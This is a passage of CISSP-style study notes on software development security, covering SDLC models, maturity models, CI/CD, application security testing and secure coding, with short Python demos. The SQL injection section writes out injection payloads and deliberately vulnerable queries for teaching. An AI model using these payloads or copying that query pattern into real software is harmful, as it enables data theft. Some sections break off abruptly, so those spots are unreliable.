improve testing and provide behavioral analysis capabilities to pinpoint the source of vulnerabilities
Knowledge Discovery in Databases (KDD): mathematical, statistical, and visualization method of identifying
valid and useful patterns in data
Knowledge Management: efficient/effective management of info and associated resources in an enterprise to
drive business intelligence and decision-making; may include workflow management, business process
modeling, doc management, db and info systems and knowledge-based systems
Level of abstraction: how closely a source-code/design doc represents the details of the underlying
object/system/component; lower-level abstractions generally have more detail than high-level ones
Living off the land (non-malware based ransom attack): system attack where the system/resources
compromised are used in pursuit of additional attacks (i.e. the attacker's agenda); anti-malware defense doesn't
detect/prevent the attack given the attacker's methodology
Malformed input attack: not correctly handling input data is a common source of code errors that can result in
arbitrary code exec, or misdirection of the program to other resources/locations
Markup Language: non-programming language used to express formatting or arrangement of data on a
page/screen; usually extensible, allowing users to define additional operations to be performed; such
extensions can turn a markup language into a programming language (e.g. the way JavaScript extends HTML)
Metadata: info that describes the format or meaning of other data, which can be used to provide a systematic
method for describing resources and improving info retrieval
Mobile code (executable content): file(s) sent by a system to others, that will either control the execution of
systems/applications on that client or be directly executed
Modified prototype model: approach to system design/build that starts with a simplified version of the
application; feedback from stakeholders is used to improve design of a second version; this is repeated until
owners/stakeholders are satisfied with the final product
Network database model: database model in which data elements and records are arranged in arbitrary linked
fashion (e.g. lists, clusters, or other network forms)
Nonfunctional requirements: broad characteristics that do not clearly align with system elements; many
safety, security, privacy, and resiliency requirements are deemed nonfunctional
Object: encapsulation of a set of data and methods that can be used to manipulate that data
Object-oriented database model: database model that uses object-oriented programming concepts like
classes, instances, and objects to organize, structure, and store data and methods; schemas define the
structure of the data, and views specify the tables, rows, and columns that meet user/security requirements
Object-oriented security: systems security designs that make use of object-oriented programming
characteristics such as encapsulation, inheritance, polymorphism, and polyinstantiation
Open-source software: source code and design info is made public, often under licenses that allow
modification and refactoring
Pair programming: requires two devs to work together, one writing code, and the other reviewing and tracking
progress
Pass-around reviews: often done via email or code review system, allows devs to review code asynchronously
PERT: Program Evaluation Review Technique; a chart that uses nodes to represent milestones or deliverables,
showing the estimated time to move between milestones
Polyinstantiation: creates a new instance (copy) of a data item, with the same identifier or key, allowing each
process to have its own version of that data; useful for enforcing and protecting different security levels for a
shared resource; polyinstantiation also allows the storage of multiple different pieces of info in a database at
different classification levels to prevent attackers from inferring anything about the absence of info
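The "same key, different classification levels" idea can be sketched with a lookup keyed by (id, level); the flight data is invented for illustration:

```python
# Two instances of the "same" record at different classification levels; each
# clearance sees its own version, so a low-clearance user cannot infer that a
# more sensitive record exists.
flights = {
    ("FL-101", "unclassified"): {"destination": "routine cargo run"},
    ("FL-101", "secret"):       {"destination": "classified mission"},
}

def lookup(flight_id: str, clearance: str) -> dict:
    return flights[(flight_id, clearance)]

low_view = lookup("FL-101", "unclassified")
high_view = lookup("FL-101", "secret")
print(low_view["destination"])   # routine cargo run
print(high_view["destination"])  # classified mission
```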
Procedural programming: emphasizes the logical sequence of steps to be performed, where a procedure is a
set of software that performs a particular function, requiring specific input data, producing a specific set of
outputs, and procedures can invoke other procedures
Query attack: use of query tools to access data not normally allowed by the trusted front end, including the
views controlled by the query application; could also result from malformed queries using SQL to bypass
security controls; improper/incomplete checks on queries can be used in a similar way to bypass access
controls
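The malformed-query bypass and its standard defense (parameterized queries) can be shown with sqlite3; the schema and payload are illustrative:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "a-secret"), ("bob", "b-secret")])

payload = "nobody' OR '1'='1"  # classic injection string

# Vulnerable: string concatenation lets the payload rewrite the query's logic.
vulnerable = conn.execute(
    "SELECT secret FROM users WHERE name = '" + payload + "'").fetchall()
print(len(vulnerable))  # 2 — the OR '1'='1' clause matched every row

# Safe: a parameterized query treats the payload as a plain literal value.
safe = conn.execute("SELECT secret FROM users WHERE name = ?", (payload,)).fetchall()
print(len(safe))        # 0 — no user is literally named that string
```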
Ransom attack: form of attack that threatens destruction, denial, or unauthorized public release/remarketing of
private information assets; usually involves encrypting assets and withholding the decryption key until a
ransom is paid by the victim
Refactoring: partial or complete rewrite of a set of software to perform the same functions, but in a more
straightforward, more efficient, or more maintainable form
Regression testing: testing a system to ascertain whether recently approved modifications have changed the
performance of other approved functions or introduced other unauthorized behavior; testing that runs a set of
known inputs against an app and compares the results to those previously produced (by an earlier version of
the software)
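The "known inputs vs. previously recorded outputs" style can be sketched as a golden-output check; slugify() and its cases are hypothetical:

```python
# Run recorded inputs through the current build and compare against outputs
# captured from the previously approved version.
def slugify(title: str) -> str:
    return title.strip().lower().replace(" ", "-")

KNOWN_GOOD = {                     # outputs recorded from the earlier release
    "Hello World": "hello-world",
    "  CISSP Notes ": "cissp-notes",
}

regressions = {inp: slugify(inp)
               for inp, expected in KNOWN_GOOD.items()
               if slugify(inp) != expected}
print(regressions)  # {} — empty means no approved behavior changed
```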
Relational database model: AKA relational database management system (RDBMS), data elements and
records arranged in tables which are related or linked to each other to implement business logic, where data
records of different structures or types are needed together in the same activity
Representational State Transfer (REST): software architectural style for synchronizing the activities of two or
more apps running on different systems on a network; REST facilitates these processes exchanging state
information, usually via HTTP/S
Reputation monitoring: defensive tactic that uses the trust reputation of a website or IP address as a means of
blocking an org's users, processes or systems from connecting to a possible source of malware or exploitations;
possibly the only real defense against zero-day exploits; involves monitoring URLs, domains, IP addresses or
other similar info to separate untrustworthy traffic
Runtime Application Security Protection (RASP): security agents comprised of small code units built into an
app which can detect a set of security violations; upon detection, the RASP agent can cause the app to
terminate, or take other protective actions
Security Assessment: testing, inspection, and analysis to determine the degree to which a system meets or
exceeds the required security posture; may assess whether an as-built system meets the requirements in its
specs, or whether an in-use system meets the current perception of the real-world security threats
Software Quality Assurance: variety of formal and informal processes that attempt to determine whether a
software app or system meets all of its intended functions, doesn't perform unwanted functions, is free from
known security vulns, and is free from insertion or other errors in design and function
SDLC: Software Development LifeCycle is a framework and systematic set of tasks performed in a series of
steps for building, deploying, and supporting software apps; begins with planning and requirements gathering,
and ends with decommissioning and sunsetting; there are many different SDLCs, such as agile, DevSecOps, and
rapid prototyping, offering different approaches to defining and managing the software lifecycle
Source code: program statements in human-readable form using a formal programming language's rules for
syntax and semantics
Spyware/Adware: software that performs a variety of monitoring and data gathering functions; AKA potentially
unwanted programs/applications (PUP/PUA), may be used in monitoring employee activities/use of resources
(spyware), or advertising efforts (adware); both may be legit/authorized by system owners or unwanted
intruders
Strong data typing: feature of a programming language preventing data type mismatch errors; strongly typed
languages will generate errors at compile time
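Python is strongly (though dynamically) typed, so it raises the mismatch at run time rather than compile time, but the effect of strong typing is the same: no silent coercion; the values are illustrative:

```python
# A type mismatch is refused instead of being silently coerced, as a weakly
# typed language might do.
try:
    mixed = "42" + 1           # str + int is a type mismatch
except TypeError:
    mixed = None               # the runtime refused the operation

explicit = int("42") + 1       # an explicit conversion states the intent
print(mixed, explicit)         # None 43
```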
Threat surface: total set of penetrations of a boundary or perimeter that surrounds or contains system
elements
TOCTOU attack: time of check vs time of use (TOCTOU) attack takes advantage of the time delay between a
security check (such as authentication or authorization) being performed and actual use of the asset
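The check/use gap can be sketched with a file-existence check; the attacker's swap is simulated inline here, whereas in a real race it happens from another process during the window:

```python
import os
import tempfile

# Time of check and time of use are separate steps, and the file can change in
# between them; the filename is illustrative.
path = os.path.join(tempfile.mkdtemp(), "report.txt")
with open(path, "w") as f:
    f.write("harmless contents")

if os.path.exists(path):                         # time of check: file looks fine
    with open(path, "w") as f:                   # simulated attacker swap in the window
        f.write("attacker-controlled contents")
    with open(path) as f:                        # time of use: acts on stale decision
        data = f.read()

print(data)  # attacker-controlled contents
```

Mitigations typically collapse the check and the use into one atomic operation (e.g. opening the file directly and handling the failure) rather than checking first.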
Trapdoor/backdoor: AKA maintenance hook; hidden mechanism that bypasses access control measures; an
entry point into an architecture or system that is inserted in software by devs during development to provide a
method of gaining access for modification/support; can also be inserted by an attacker, bypassing access
control measures designed to prevent unauthorized software changes
UAT: User Acceptance Testing is typically the last phase of the testing process; verifies that the solution
developed meets user requirements, and validates it against use cases
8.1 Understand and integrate security in the Software Development Life Cycle (SDLC)
(OSG-10 Chpt 20)
8.1.1 Development methodologies (e.g., Agile, Waterfall, DevOps, DevSecOps, Scaled Agile Framework)
Agile methodology: a project management approach to development that involves breaking the project
into phases and emphasizes continuous collaboration and improvement; teams follow a cycle of planning,
executing, and evaluating; focus is on iterative development and frequent feedback, collab between small
self-organizing cross-functional teams; in a very simplified sense, you can say agile is waterfall done in
sprints
Agile development emphasizes:
the delivery of working software in short iterations, helping to get the software to market
faster
reduced risk by frequently testing and providing feedback, helping to identify and resolve
issues earlier in the development process
Agile was started by 17 pioneers in 2001, producing the "Manifesto for Agile Software
Development" (agilemanifesto.org) that lays out the core philosophy of the Agile approach:
individuals and interactions over processes and tools
working software over comprehensive documentation
customer collaboration over contract negotiation
responding to change over following a plan
Agile Manifesto also defines 12 principles:
the highest priority is to satisfy the customer through early and continuous delivery of
valuable software
welcome changing requirements, even late in development; Agile processes harness change
for the customerʼs competitive advantage
deliver working software frequently, from a couple of weeks to a couple of months, with a
preference for the shorter timescale
business people and developers must work together daily throughout the project
build projects around motivated individuals; give them the environment, support, and tools
and trust them to build
emphasizing face-to-face conversation
working software is the primary measure of progress
agile processes promote sustainable development; the team should be able to maintain a
constant pace indefinitely
continuous attention to technical excellence and good design enhances agility
simplicity, or the art of maximizing the amount of work not done, is essential
the best architectures, requirements, and designs emerge from self-organizing teams
at regular intervals, the team reflects on how to become more effective and adjusts accordingly
Several methodologies have emerged that take these Agile principles and define specific processes
around them:
Scrum: a management framework that teams use to self-organize and work towards a
common goal; it describes a set of meetings, tools, and roles for efficient project delivery,
allowing teams to self-manage, learn from experience, and adapt to change; named from the
daily team meetings, called scrums; development focuses on short sprints that deliver
finished products; integrated product teams (IPTs) were an early effort of this approach
Kanban: a visual system used to manage and keep track of work as it moves through a
process; the word kanban is Japanese for "card you can see"; Kanban teams focus on
reducing the time a project (or user story) takes from start to finish, using a kanban board
and continuously improving their flow of work
Rapid Application Development (RAD): an agile software development approach that
focuses more on ongoing software projects and user feedback and less on following a strict
plan, emphasizing rapid prototyping over planning; RAD uses four phases: requirements
planning, user design, construction, and cutover
Rational Unified Process (RUP): an agile software development methodology that splits the
project life cycle into four phases:
inception: defines the scope of the project and develops the business case
elaboration: plans the project, specifies features, and baselines the architecture
construction: builds the product
transition: provides the product to its users
during each of the phases, all six core development disciplines take place: business
modeling, requirements, analysis and design, implementation, testing, and deployment
Agile Unified Process (AUP): a simplified version of the rational unified process, it
describes a simple, easy to understand approach to developing business application
software using agile techniques and concepts yet still remaining true to the RUP
Dynamic Systems Development Model (DSDM): an agile project delivery framework,
initially used as a software development method; key principles:
focus on the business need: DSDM teams establish a valid business case and ensure
organizational support throughout the project
deliver on time: work should be time-boxed and predictable, to build confidence in the
development team
Extreme Programming (XP): an Agile project management methodology that targets speed
and simplicity with short development cycles, using five guiding values, and five rules; the
goal of the rigid structure, focused sprints and continuous integrations is higher quality
product
Scaled Agile Framework® (SAFe): a set of org and workflow patterns for implementing
agile practices at an enterprise scale; the framework is a body of knowledge that includes
structured guidance on roles and responsibilities, how to plan and manage the work, and
values to uphold
Scaled Agile Framework: agile methodology applied to large orgs; allows large organizations with
multiple teams to coordinate, collaborate, and deliver products
Waterfall:
A linear approach to development, where each phase needs to be completed fully before the next
one begins (e.g. water only flows downhill or in one direction); developed by Winston Royce in
1970, the waterfall model uses a linear sequential life-cycle approach; all project requirements are
gathered up front, and there is no formal way to integrate changes as more information becomes
available
The traditional model has 7 stages; as each stage is completed, the project moves into the next
phase; the iterative waterfall model does allow development to return to the previous phase to
correct defects
System requirements
Software requirements
Preliminary design
Detailed design
Code and debug
Testing
Operations and maintenance
A major criticism of this model is that it's very rigid, and not ideal for most complex projects which
often contain many variables that affect the scope throughout the project's lifecycle
Spiral model: improved waterfall dev process providing for a cycle of Plan, Do, Check, Act (PDCA) sub-
stages at each phase of the SDLC; a risk-driven development process that follows an iterative model
while also including waterfall elements
following defined phases to completion and then repeats the process, resembling a spiral
the spiral model provides a solution to the major criticism of the waterfall model in that it allows
devs to return to planning stages as technical demands and customer requirements iterate
DevOps (Development and Operations): an approach to software development, quality assurance, and
technology operations that unites siloed staff, bringing the three functions together in a single
operational model; the DevOps goal is to shorten the systems development lifecycle and provide continuous
delivery
closely aligned with lean and the Agile development approach, DevOps aims to dramatically
decrease the time required to develop, test, and deploy software changes
using the DevOps model, and continuous integration/continuous delivery (CI/CD), orgs strive to roll
out code dozens or even hundreds of times per day
this requires a high degree of automation, including integrating code repositories, the software
configuration management process, and the movement of code between development, testing and
production environments
the tight integration of development and operations also calls for the simultaneous integration of
security controls
security must be tightly integrated and move with the same agility
DevSecOps: refers to the integration of development, security, and operations; extends DevOps by
integrating security practices
provides for a merger of phased review (as in the waterfall SDLC) with the DevOps method, to
incorporate the needs for security, safety, resilience or other emerging properties in the final
system, at each turn of the cycle of development
DevSecOps supports the concept of software-defined security, where security controls are actively
managed into the CI/CD pipeline
8.1.2 Maturity models (e.g., Capability Maturity Model (CMM), Software Assurance Maturity Model (SAMM))
Maturity models help software organizations improve the maturity and quality of their software processes
by implementing an evolutionary path from ad hoc, chaotic processes to mature, disciplined processes
NOTE: be able to describe the SW-CMM, IDEAL, and SAMM models
Software Engineering Institute (SEI) (Carnegie Mellon University) created the Capability Maturity Model
for Software (AKA Software Capability Maturity Model, abbreviated SW-CMM, CMM, or SCMM)
SW-CMM: a management process to foster the ongoing and continuous improvement of an org's
processes and workflows for developing, maintaining and using software
all software development moves through a set of maturity phases in sequential fashion, and CMM
describes the principles and practices underlying software process maturity, intended to help
improve the maturity and quality of software processes
note that CMM doesn't explicitly address security
stages of the CMM:
Level 1: Initial: process is disorganized; usually little or no defined software development
process
no KPIs
processes are ad-hoc, and immature
no basis for predicting project quality, time to completion etc
limited project management
limited software dev tools or automation
highly dependent on individual's skills and knowledge
Level 2: Repeatable: in this phase, basic lifecycle management processes are introduced
focus on establishing basic project management policies
project planning
configuration management
requirements management
sub-contract management
software quality assurance
Level 3: Defined: in this phase, software devs operate according to a set of formal,
documented software development processes; marked by the presence of basic lifecycle
management processes and reuse of code; includes the use of requirements management,
software project planning, quality assurance, and configuration management
documentation of standard guidelines and procedures takes place
peer reviews
intergroup coordination
org process definition
org process focus
training programs
Level 4: Managed: in this phase, there is better management of the software process;
characterized by the use of quantitative software development measures
quantitative goals are set for software products and process
software quality management
quantitative management
Level 5: Optimizing: in this phase continuous improvement occurs
process change management
technology change management
defect prevention
Software Assurance Maturity Model (SAMM): an open source project maintained by the Open Web
Application Security Project (OWASP)
provides a framework for integrating security into the software development and maintenance
processes and provides orgs with the ability to assess their maturity
SAMM associates software development with 5 business functions:
Governance: the activities needed to manage software development processes
this function includes practices for:
strategy
metrics
policy
compliance
education
guidance
Design: process used to define software requirements and develop software
this function includes practices for:
threat modeling
threat assessment
security requirements
security architecture
Implementation: process of building and deploying software components and managing
flaws
this function includes:
secure build
secure deployment
defect management practices
Verification: activities undertaken to confirm code meets business and security requirements
this function includes:
architecture assessment
requirements-driven testing
security testing
Operations: actions taken to maintain security throughout the software lifecycle after code is
released
function includes:
incident management
environment management
operational management
IDEAL Model: a model for software development, developed by the Software Engineering Institute (SEI), that uses many of the SW-CMM attributes across 5 phases:
Initiating: business reasons for the change are outlined, support is built, and applicable
infrastructure is allocated
Diagnosing: in this phase, engineers analyze the current state of the org and make general
recommendations for change
Establishing: development of a specific plan of action based on the diagnosing phase
recommendations
Acting: in this phase, the org develops solutions and then tests, refines, and implements them
Learning: continuously analyze efforts to achieve these goals, and propose new actions as required
IDEAL vs SW-CMM:
| IDEAL | SW-CMM |
| --- | --- |
| Initiating | Initial |
| Diagnosing | Repeatable |
| Establishing | Defined |
| Acting | Managed |
| Learning | Optimizing |
8.1.3 Operations and maintenance
Once delivered to the production environment, software devs must make any additional changes to
accommodate unexpected bugs, vulnerabilities, or interoperability issues
They must also keep pace with changing business processes, and work closely with the operations team
(typically IT), to ensure reliable operations
together, ops and development transition a new system to production and management of the
system's config
The dev team must continually provide hotfixes, patches, and new releases to address discovered
security issues and identified coding errors
8.1.4 Change management
Change management (AKA control management) plays an important role when monitoring systems in a
controlled environment, and has 3 basic components:
Request Control: process that provides an organized framework within which users can request
modifications, managers can conduct cost/benefit analysis, and developers can prioritize tasks
Change Control: the process of controlling specific changes that need to take place during the life
cycle of a system, serving to document the necessary change-related activities; or the process of
providing an organized framework within which multiple devs can create and test a solution prior to
rolling it out in a production environment
where change management is the project managerʼs responsibility for the overarching
process, change control is what devs do to ensure the software or environment doesnʼt
break when changed
change control is basically the process used by devs to re-create a situation encountered by
a user and analyze the appropriate changes
Release Control: once changes are finalized, they must be approved for release through the
release control procedure
one of the responsibilities of release control is ensuring that the process includes
acceptance testing, confirming that any alterations to end-user work tasks are understood
and functional prior to code release
8.1.5 Integrated Product Team (IPT)
Integrated Product Team (IPT): Introduced by the US Department of Defense (DoD) as an approach to
bring together multifunctional teams with a single goal of delivering a product or developing a process or
policy, and fostering parallel, rather than sequential, decisions
Essentially, IPT is used to ensure that all aspects of a product, process, or policy are considered during
the development process
8.2 Identify and apply security controls in development ecosystems (OSG-10 Chpts
15,20,21)
Applications, including custom systems, can present significant risks and vulnerabilities, and to protect against
these it's important to introduce security controls into the entire systemʼs development lifecycle
8.2.1 Programming languages
Computers understand 1s and 0s (binary), and each CPU has its own (machine) language
Assembly language: a way of using mnemonics to represent the basic instruction set of a CPU
Assemblers: tools that convert assembly language source code into machine code
Third-generation programming languages, such as C/C++, Java, and Python, are known as high-level
languages
high-level languages allow developers to write instructions that better approximate human
communication
Compiled language: converts source code into machine-executable format
compiled code is generally less prone to manipulation by a third party; however, it is easier
to embed backdoors or other security flaws in compiled code without detection
Decompilers: convert a binary executable back into source code
Disassemblers: convert a binary executable back into human-readable assembly language (an
intermediate representation produced during the compilation process)
Interpreted language: uses an interpreter to execute; source code is viewable; e.g. Python, R, JavaScript,
VBScript
Object-oriented programming (OOP): defines an object as a set of software that offers one or more
methods, internal to the object, that software external to the object can request access to; each method
may require specific inputs and resources and may produce a specified set of outputs; OOP focuses on
the objects involved in an interaction
OOP languages include C++, Java, and .NET
think of OOP as a group of objects that can be requested to perform certain operations or exhibit
certain behaviors, working together to provide a systemʼs functionality or capabilities
OOP has the potential to be more reliable and to reduce the propagation of program change errors,
and is better suited to modeling or mimicking the real world
each object in the OOP model has methods that correspond to specific actions that can be taken
on the object
objects can also be subclasses of other objects and inherit methods from their parent class; the
subclasses can use all the methods of the parent class and have additional class-specific methods
from a security standpoint, object-oriented programming provides a black-box approach to
abstraction
OOP terms:
message: a communication to or input of an object
method: internal code that defines the actions of an object
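A minimal illustrative sketch of these OOP concepts in Python (methods, subclassing, inheritance, and black-box abstraction); the Account/SavingsAccount classes are hypothetical examples, not from the OSG:

```python
class Account:
    """Parent class: exposes methods, hides internal state (abstraction)."""
    def __init__(self, owner: str, balance: float = 0.0):
        self.owner = owner
        self._balance = balance          # internal state, not accessed directly

    def deposit(self, amount: float) -> None:   # a method: an action on the object
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self._balance += amount

    def balance(self) -> float:
        return self._balance

class SavingsAccount(Account):
    """Subclass: inherits deposit()/balance(), adds a class-specific method."""
    def add_interest(self, rate: float) -> None:
        self._balance += self._balance * rate

acct = SavingsAccount("alice", 100.0)
acct.deposit(50.0)            # inherited method (a "message" sent to the object)
acct.add_interest(0.10)       # subclass-specific method
print(acct.balance())         # 165.0
```

Callers interact only through the methods; the `_balance` attribute stays behind the black box.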
Continuous Integration and Continuous Delivery: workflow automation processes and tools that
attempt to reduce, if not eliminate, the need for manual communication and coordination between the
steps of a software development process
Continuous integration (CI): all new code is integrated into the rest of the system as soon as the
developer writes it, merging it into a shared repo
this merge triggers a batch of unit tests
if it merges without error, it's subjected to integration tests
CI improves software development efficiency by identifying errors early and often
CI also allows the practice of continuous delivery (CD)
Continuous Delivery (CD): incrementally building a software product that can be released at any time;
because all processes and tests are automated, code can be released to production daily or more often
CI/CD relies on automation and often third-party tools which can have vulnerabilities or be compromised
Secure practices such as threat modeling, least privilege, defense in depth, and zero trust can help
reduce possible threats to these tools and systems
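The CI gating flow described above (merge triggers unit tests, which gate integration tests) can be sketched as follows; the functions are hypothetical stand-ins for a real test runner and pipeline, not any actual CI tool's API:

```python
def run_unit_tests() -> bool:
    # stand-in for a real unit-test runner (e.g., pytest) triggered on merge
    return all([1 + 1 == 2, "a".upper() == "A"])

def run_integration_tests() -> bool:
    # stand-in for slower tests exercising components together
    return True

def ci_pipeline() -> str:
    """Gate each stage: integration tests run only if unit tests pass."""
    if not run_unit_tests():
        return "rejected: unit tests failed"
    if not run_integration_tests():
        return "rejected: integration tests failed"
    return "merged: ready for continuous delivery"

print(ci_pipeline())  # merged: ready for continuous delivery
```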
8.2.7 Software Configuration Management
Software Configuration Management (SCM): a product that identifies the attributes of software at
various points in time and performs methodical change control for the purpose of maintaining software
integrity and traceability throughout the SDLC
SCM tracks config changes, and verifies that the delivered software includes all approved changes
SCM systems manage and track revisions made by multiple people against a single master
software repository, providing concurrency management, versioning, and synchronization
auditing and logging of software changes mitigates risk to the organization by:
providing a detailed record of all modifications made to software applications
allowing security teams to identify suspicious activity, quickly detect unauthorized
changes, and investigate potential security breaches
enabling corrective action, ultimately protecting the integrity and confidentiality of the
org's data and systems
8.2.8 Code repositories
Software development is a collaborative effort, and larger projects require teams of devs working
simultaneously on different parts
Code repositories support collaborations, acting as a central storage point for source code
GitHub, Bitbucket, and SourceForge are examples of systems that provide version control, bug
tracking, web hosting, release management, and communications functionality
8.2.9 Application security testing (e.g., static application security testing (SAST), dynamic application security
testing (DAST), software composition analysis, Interactive Application Security Test (IAST))
Static Application Security Testing (SAST): AKA static analysis; tools and techniques that help identify
software defects (e.g. data type errors, loop/structure bounds violations, unreachable code) or security
policy violations by examining the code without executing the program (or before the program is
compiled)
the term SAST is generally reserved for automated tools that assist analysts and developers,
whereas manual inspection by humans is generally referred to as code review
SAST allows devs to scan source code for flaws and vulns; it also provides a scalable method of
security code review and ensuring that devs are following secure coding policies
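As a toy illustration of static analysis (not a real SAST tool), the following walks a Python abstract syntax tree to flag calls to `eval()`, a common code-injection risk, without ever executing the scanned code; real SAST products apply hundreds of such rules:

```python
import ast

def find_eval_calls(source: str) -> list[int]:
    """Return line numbers where eval() is called, found by walking the AST."""
    tree = ast.parse(source)          # parse only; the code is never executed
    hits = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id == "eval"):
            hits.append(node.lineno)
    return hits

sample = "x = input()\nresult = eval(x)\n"
print(find_eval_calls(sample))  # [2]
```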
Dynamic Application Security Testing (DAST): AKA dynamic analysis, is the evaluation of a program
while running in real time
tools that execute the software unit, application or system under test, in ways that attempt to drive
it to reveal a potentially exploitable vulnerability
DAST is usually performed once a program has cleared SAST and basic code flaws have been fixed
DAST enables devs to trace subtle logical errors that are likely to cause security problems, without
the need to create artificial error-inducing scenarios
dynamic analysis is also effective for compatibility testing, detecting memory leakages, identifying
dependencies, and analyzing software without accessing the softwareʼs actual source code
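A minimal dynamic-testing sketch in this spirit: drive a running function with many generated inputs to surface a hidden defect, without reading its source. `parse_age` is a hypothetical function under test, and the harness is illustrative, not a real DAST tool:

```python
import random

def parse_age(value: str) -> int:
    return int(value)       # defect: no range check, accepts negative ages

def fuzz(fn, trials: int = 200) -> list[str]:
    """Drive fn with random inputs; collect inputs producing invalid output."""
    random.seed(0)          # deterministic for the example
    failures = []
    for _ in range(trials):
        candidate = str(random.randint(-1000, 1000))
        try:
            if fn(candidate) < 0:       # an age should never be negative
                failures.append(candidate)
        except ValueError:
            pass                        # rejecting an input is acceptable
    return failures

print(len(fuzz(parse_age)) > 0)  # True: fuzzing exposed the missing range check
```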
Interactive Application Security Testing (IAST): the combination of SAST and DAST; application
testing is done on the running system (DAST) with access to the source code (SAST)
8.3 Assess the effectiveness of software security (OSG-10 Chpts 20,21)
8.3.1 Auditing and logging of changes
Applications should be configured to log details of errors and other security events to a centralized log
repository
The Open Web Application Security Project (OWASP) Secure Coding Practices suggest logging the
following events:
input validation failures
authentication attempts, especially failures
access control failures
tampering attempts
use of invalid or expired session tokens
exceptions raised by the OS or applications
use of admin privileges
Transport Layer Security (TLS) failures
cryptographic errors
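A minimal sketch of logging two of the events suggested above with Python's standard logging module; the logger name, message wording, and handler setup are illustrative assumptions (a production app would ship these records to a centralized log repository):

```python
import logging

logger = logging.getLogger("appsec")
handler = logging.StreamHandler()     # stand-in for a centralized log sink
handler.setFormatter(logging.Formatter(
    "%(asctime)s %(levelname)s %(name)s %(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.INFO)

def log_auth_attempt(user: str, success: bool) -> None:
    # OWASP: log authentication attempts, especially failures
    if success:
        logger.info("authentication success user=%s", user)
    else:
        logger.warning("authentication failure user=%s", user)

def log_input_validation_failure(field: str, reason: str) -> None:
    logger.warning("input validation failure field=%s reason=%s", field, reason)

log_auth_attempt("alice", False)
log_input_validation_failure("email", "value exceeds maximum length")
```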
8.3.2 Risk analysis and mitigation
Risk management is at the center of secure software development, in particular regarding the mapping of
identified risks and implemented controls
this is a difficult part of secure software dev, especially related to auditing
Threat modeling is important to dev teams, and particularly in DevSecOps
Assessors are also interested in the linkages between the software dev and risk management programs
software projects should be tracked in the orgʼs risk matrix, to ensure the dev team is connected to
the broader risk management efforts, and not working in isolation
8.4 Assess security impact of acquired software (OSG-10 Chpts 16,20)
8.4.1 Commercial-off-the-shelf (COTS)
Commercial Off-the-Shelf (COTS): software elements, usually apps, that are provided as finished
products (not intended for alteration by or for the end-user)
Most widely used commercial-off-the-shelf (COTS) software products have been tested by security
researchers (both benign and malicious)
researching discovered vulnerabilities and exploits can help us understand how seriously the
vendor takes security
for niche products, you should research vendor certifications, such as ISO/IEC 27034 Application
Security
other than secure coding certification, you can look for overall information security management
system (ISMS) certifications such as ISO/IEC 27001 and FedRAMP (which are difficult to obtain, and
show that the vendor is serious about security)
If you can talk with a vendor, look for processes like defensive programming, which is a software
development best practice that means as code is developed or reviewed, they are constantly looking for
A source code vulnerability is a code defect providing a threat actor with an opportunity to compromise
the security of a software system
source code vulns are caused by design or implementation flaws
design flaw: if dev did everything correctly, there would still be a vulnerability
implementation flaw: dev incorrectly implemented part of a good design
the OWASP Top 10 vulnerabilities (2021 edition):
Broken access control
Cryptographic failures
Injection
Insecure design
Security misconfiguration
Vulnerable and outdated components
Identification and authentication failures
Software and data integrity failures
Security logging and monitoring failures
Server Side Request Forgery (SSRF)
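As a sketch of one implementation flaw from the list above (injection): the design (look up a user by name) is sound, but the first implementation builds SQL by string concatenation; parameter binding corrects the implementation. The schema and data are illustrative:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'user')")

def find_user_vulnerable(name: str):
    # implementation flaw: attacker-controlled string concatenated into SQL
    return conn.execute(
        f"SELECT role FROM users WHERE name = '{name}'").fetchall()

def find_user_safe(name: str):
    # correct implementation: parameter binding treats the input as data
    return conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)).fetchall()

payload = "' OR '1'='1"
print(find_user_vulnerable(payload))  # [('user',)] -- injection succeeds
print(find_user_safe(payload))        # [] -- injection neutralized
```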
8.5.2 Security of Application Programming Interfaces (APIs)
Application Programming Interface (API): specifies the manner in which a software component
interacts with other components
APIs reduce the effort of providing secure component interactions by providing easy
implementation for security controls
APIs reduce code maintenance by encouraging software reuse, and keeping the location of
changes in one place
Parameter validation: ensuring that any API parameter is checked against being malformed,
invalid, or malicious helps ensure API secure use; validation confirms that the parameter values
being received by an app are within defined limits before they are processed by the system
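A minimal parameter-validation sketch for an API endpoint: every value is checked against defined limits before the system processes it. The field names and limits are illustrative assumptions:

```python
# Defined limits for each accepted parameter (illustrative values)
LIMITS = {
    "page":     {"type": int, "min": 1, "max": 10_000},
    "per_page": {"type": int, "min": 1, "max": 100},
}

def validate_params(params: dict) -> dict:
    """Reject unknown, malformed, or out-of-range parameters before use."""
    clean = {}
    for key, value in params.items():
        rule = LIMITS.get(key)
        if rule is None:
            raise ValueError(f"unknown parameter: {key}")
        if not isinstance(value, rule["type"]):
            raise ValueError(f"malformed parameter: {key}")
        if not rule["min"] <= value <= rule["max"]:
            raise ValueError(f"out-of-range parameter: {key}")
        clean[key] = value
    return clean

print(validate_params({"page": 2, "per_page": 50}))  # {'page': 2, 'per_page': 50}
```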
8.5.3 Security coding practices
Secure coding practices can be summarized as standards and guidelines
standards: mandatory activities, actions, or rules
guidelines: recommended actions or ops guidelines that provide flexibility for unforeseen
circumstances
orgs greatly reduce source code vulns by enforcing secure coding standards and maintaining
coding guidelines that reflect best practices
To be considered a standard, a coding practice must meet the following criteria:
reduce the risk of a particular type of vuln
be enforceable across all of an org's software development efforts
be verifiably implemented
Note: secure coding standards, rigorously applied, are the best way to reduce source code vulns; coding
standards ensure devs always do certain things in a certain way, while avoiding others
Secure coding guidelines are recommended practices that tend to be less specific than standards
e.g. consistently formatted code comments, or keeping code functions short/tight
8.5.4 Software-defined security
Software-defined security (SDS or SDSec): a security model in which security functions such as
firewalling, IDS/IPS, and network segmentation are implemented in software within an SDN environment
one of the advantages of this approach is that sensors (for systems like IDS/IPS) can be
dynamically repositioned depending on the threat
SDS provides decoupling from physical devices because it abstracts security functions into
software that can run on any compatible physical or virtual infrastructure, which is critical for
supporting the dynamic scaling of cloud services and virtualized data centers
DevSecOps supports the concept of software-defined security, where security controls are actively
integrated into the CI/CD pipeline